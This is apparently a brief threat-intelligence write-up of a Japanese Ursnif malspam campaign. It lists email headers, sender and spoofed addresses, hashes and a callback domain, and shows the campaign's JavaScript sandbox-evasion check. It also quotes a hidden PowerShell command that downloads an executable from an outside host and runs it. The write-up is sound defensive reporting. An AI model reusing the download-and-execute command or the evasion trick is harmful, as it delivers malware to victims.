Quick Analysis of Japanese Ursnif Malspam Campaign

Malware Delivery Method

docx attachment in email

Execution process

attached docx opened -> embedded JavaScript executes -> powershell runs the script and communicates with internet -> downloads payload over HTTPS


Document sent as an attachment in the following email:

Subject: =?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?=
From: =?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <[email protected]>
To: <[email protected]>
Original attachment name: 原価請求書です277253.docx ("copy of Invoice" when translated)
MD5 hash: 85d09006634ab5f2138ac927997accda

Below are the unique sender email addresses observed in the Ursnif campaign which are sending the malicious Documents as email attachments:

[email protected]
[email protected]
[email protected]

And below are the spoofed addresses:

[email protected]
[email protected]
[email protected]

Embedded JavaScript in the docx performs the following tasks:

  • Detects Sleep Short Circuiting by checking the time difference between time-stamps before and after Sleep function is invoked.

TJoMcZPXpCNhHVlsn = new Date()[piUCkfeTbuHWBQdaRl]();
qWBKNMtLEHISpva = new Date()[piUCkfeTbuHWBQdaRl]();

  • If Sleep Short Circuiting is not detected then JavaScript will execute Powershell to download the malicious payload over HTTPS as shown below:

lhzYcTRDtUorLVmdP.ShellExecute(“cmd.eXE”, “/c ping localhost & powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(‘https://aedwards.co/wp-includes/IXR/get.php?jgTbz’,’%appdata%xJr23.eXe’); sTarT-PROcess ‘%appdAta%xJr23.exe'”, “”, “open”, 0);


MD5 hash of the downloaded payload:


Downloaded payload will perform the following Network Callback post execution:


Interesting callback domain name:

antispam.city (how ironic)
Whois info shows that this domain was recently registered on 14th August 2017.